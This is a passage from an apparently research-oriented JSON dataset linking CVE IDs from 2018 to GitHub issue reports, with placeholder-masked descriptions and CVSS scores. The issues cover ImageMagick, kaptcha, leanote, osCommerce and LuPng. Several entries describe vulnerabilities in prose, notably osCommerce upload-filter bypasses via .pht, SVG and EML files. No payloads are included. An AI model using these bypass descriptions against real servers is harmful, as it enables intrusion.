  27188. "Issue_Url_new": "https://github.com/penggle/kaptcha/issues/3",
  27189. "Repo_new": "penggle/kaptcha",
  27190. "Issue_Created_At": "2018-10-18T02:18:47Z",
  27191. "description": "Insecure Random. URLTAG I think it should be use a secure random algorithm APITAG An attacker will simply compute the seed from the output values observed. This takes significantly less time than NUMBERTAG in the case of APITAG It is shown that you can predict future Random outputs observing only two(!) output values in time roughly NUMBERTAG",
  27192. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27193. "severity": "CRITICAL",
  27194. "baseScore": 9.8,
  27195. "impactScore": 5.9,
  27196. "exploitabilityScore": 3.9
  27197. },
  27198. {
  27199. "CVE_ID": "CVE-2018-18544",
  27200. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1360",
  27201. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1360",
  27202. "Repo_new": "imagemagick/imagemagick",
  27203. "Issue_Created_At": "2018-10-19T16:20:51Z",
  27204. "description": "Memory Leak in function APITAG of msl.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a memroy leak in function APITAG of msl.c Steps to Reproduce APITAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG e3 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG b5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG a2 in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG bc in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG ae5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec1a2 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG efbdb9 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG efcf6c in APITAG APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG ab6c NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG efcf7c in APITAG APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG be in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Tue Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  27205. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27206. "severity": "MEDIUM",
  27207. "baseScore": 6.5,
  27208. "impactScore": 3.6,
  27209. "exploitabilityScore": 2.8
  27210. },
  27211. {
  27212. "CVE_ID": "CVE-2018-18545",
  27213. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/14",
  27214. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/14",
  27215. "Repo_new": "fiyocms/fiyocms",
  27216. "Issue_Created_At": "2018-10-20T15:43:31Z",
  27217. "description": "PATHTAG $_POST FILETAG FILETAG FILETAG FILETAG",
  27218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27219. "severity": "MEDIUM",
  27220. "baseScore": 6.1,
  27221. "impactScore": 2.7,
  27222. "exploitabilityScore": 2.8
  27223. },
  27224. {
  27225. "CVE_ID": "CVE-2018-18553",
  27226. "Issue_Url_old": "https://github.com/leanote/leanote/issues/822",
  27227. "Issue_Url_new": "https://github.com/leanote/leanote/issues/822",
  27228. "Repo_new": "leanote/leanote",
  27229. "Issue_Created_At": "2018-10-20T04:34:31Z",
  27230. "description": "There is a XSS. when I set the title at the APITAG Basic Setting\",I found there is not a sanitizer to filter the malicious code, such as APITAG .If I click the \"likes\" button at target's blog, when others open this blog, there is a pop window. APITAG",
  27231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27232. "severity": "MEDIUM",
  27233. "baseScore": 6.1,
  27234. "impactScore": 2.7,
  27235. "exploitabilityScore": 2.8
  27236. },
  27237. {
  27238. "CVE_ID": "CVE-2018-18572",
  27239. "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/631",
  27240. "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/631",
  27241. "Repo_new": "oscommerce/oscommerce2",
  27242. "Issue_Created_At": "2018-11-05T09:03:29Z",
  27243. "description": "APITAG NUMBERTAG allows to execute several file types.. Brief of this vulnerability APITAG use APITAG file for preventing to execute php and html files. But it is not complete set to preventing all of malicious files. As the result, Adversary can upload several types of malicious file. This vulnerability needs the admin credentials, but this vulnerability can be used to compromise web server that APITAG installed. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Tested version NUMBERTAG Payload & Reason of vulnerability NUMBERTAG upload point Page : Admin page > Catalog > Categories / Products > New Products Upload malicious files via product images elements. Found Harmful Files is listed below NUMBERTAG PHP Code Execution Description of vulnerability APITAG file located in APITAG directory. It prevents to execution of several dangerous extensions. But its regular expression do not prevent pht extensions. As a result, php script with pht extension can be uploaded and executed. ps. If APITAG runs on PHP NUMBERTAG environment, phar extension also can be executed in the server. This vulnerability reserved to CVETAG NUMBERTAG Handle the arbitrary file to execute as PHP script Description of vulnerability Upload File filter can not prevent to upload new APITAG file. So, adversary can change the APITAG file. If APITAG file changed, all of the PHP supported file can be executed. Even file that has arbitrary extension and PHP script can be executed. This vulnerability reserved to CVETAG NUMBERTAG Execute HTML using SVG file format Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. One of the extension string is svg . If adversary assemble SVG file and HTML file to SVG file, that assembed SVG file can be execute HTML in client browser NUMBERTAG Execute HTML using EML file format ( IE only ) Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. eml extention is not executed in other browsers, but only Internet Explorer render HTML elements in eml file NUMBERTAG Execute HTML using Strange file extension or No extension Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. The file that has no extension or strange extension can be rendered in web browsers. Vulnerability NUMBERTAG and NUMBERTAG are about PHP Code execution via arbitrary file upload, and others are about HTML Execution (related with XSS). These vulnerabilities needs administrator credentials, but I still think it is vulnerable. I did not upload test payloads due to abuse this vulnerabilities by other persons. If you needs to fix these vulnerability, please announce me your mail. Thank you.",
  27244. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27245. "severity": "HIGH",
  27246. "baseScore": 7.2,
  27247. "impactScore": 5.9,
  27248. "exploitabilityScore": 1.2
  27249. },
  27250. {
  27251. "CVE_ID": "CVE-2018-18579",
  27252. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/6",
  27253. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/6",
  27254. "Repo_new": "ky-j/dedecms",
  27255. "Issue_Created_At": "2018-10-22T14:06:14Z",
  27256. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG sp2. FILETAG Phink club APITAG",
  27257. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27258. "severity": "MEDIUM",
  27259. "baseScore": 6.1,
  27260. "impactScore": 2.7,
  27261. "exploitabilityScore": 2.8
  27262. },
  27263. {
  27264. "CVE_ID": "CVE-2018-18581",
  27265. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/7",
  27266. "Issue_Url_new": "https://github.com/jansol/lupng/issues/7",
  27267. "Repo_new": "jansol/lupng",
  27268. "Issue_Created_At": "2018-10-21T07:15:32Z",
  27269. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27270. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27271. "severity": "HIGH",
  27272. "baseScore": 8.8,
  27273. "impactScore": 5.9,
  27274. "exploitabilityScore": 2.8
  27275. },
  27276. {
  27277. "CVE_ID": "CVE-2018-18582",
  27278. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/9",
